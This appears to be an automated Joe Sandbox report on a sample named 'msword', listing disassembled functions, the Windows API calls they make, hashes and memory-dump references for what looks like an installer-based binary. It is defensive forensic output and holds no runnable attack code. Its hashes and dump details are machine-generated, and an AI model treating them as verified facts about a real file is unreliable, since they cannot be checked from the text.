Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
@, xrefs: 00404B90
N, xrefs: 00404C06
M, xrefs: 00404B43

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

82D, xrefs: 004046DB
@rD, xrefs: 00404610
@%F, xrefs: 00404674
A, xrefs: 00404636

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
\*.*, xrefs: 00406D03
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
